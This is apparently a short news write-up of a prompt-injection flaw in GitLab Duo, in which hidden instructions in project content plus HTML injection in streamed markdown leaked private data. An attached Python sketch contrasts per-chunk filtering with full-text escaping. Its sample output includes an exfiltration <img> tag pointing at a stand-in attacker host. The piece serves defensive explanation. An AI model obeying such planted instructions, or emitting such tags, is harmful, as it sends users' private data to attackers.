

GitLab Duo, riding on Anthropic’s Claude, stumbled into a prompt injection blunder. Hidden instructions planted in project content let attackers swipe private data. The culprit? Streamed markdown output combined with shoddy sanitization, which opened the door to HTML injection and put a spotlight on the double-edged sword of AI assistants: useful, but also a tad too exploitable. GitLab scrambled to patch these holes, but the episode serves as a stark reminder: AI assistants need a fortress against crafty tampering.
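Why does streaming make sanitization harder? The sketch below is a generic illustration, not GitLab's actual code. It assumes a hypothetical filter that strips complete `<img>` tags from each streamed chunk on its own. When an injected tag is split across two chunks, that filter never sees the whole tag, so the live tag survives reassembly. Escaping the fully accumulated text neutralizes it. The payload, the `attacker.example` domain, and all function names are illustrative assumptions.

```python
import html
import re

# Hypothetical naive filter: removes <img ...> tags only if the whole tag is in view.
IMG_TAG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)


def naive_filter(chunk: str) -> str:
    """Strip complete <img> tags from a single chunk."""
    return IMG_TAG.sub("", chunk)


def render_stream_naively(chunks: list[str]) -> str:
    """Filter each streamed chunk independently, then concatenate the results."""
    return "".join(naive_filter(c) for c in chunks)


def render_stream_safely(chunks: list[str]) -> str:
    """Accumulate the full text first, then escape all raw HTML so none of it is live."""
    return html.escape("".join(chunks), quote=True)


# Illustrative model output where the injected exfiltration tag straddles a chunk boundary.
chunks = ["Summary done. <im", 'g src="https://attacker.example/x?d=c2VjcmV0">']

print(render_stream_naively(chunks))  # the <img> tag survives intact
print(render_stream_safely(chunks))   # the tag is rendered as inert text
```

Escaping every raw HTML character is a deliberately blunt choice; it does not address markdown's own image syntax (`![](url)`), which can trigger the same kind of outbound request. A production renderer would likely pair an allowlist-based HTML sanitizer with restrictions on which URLs images and links may load from.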
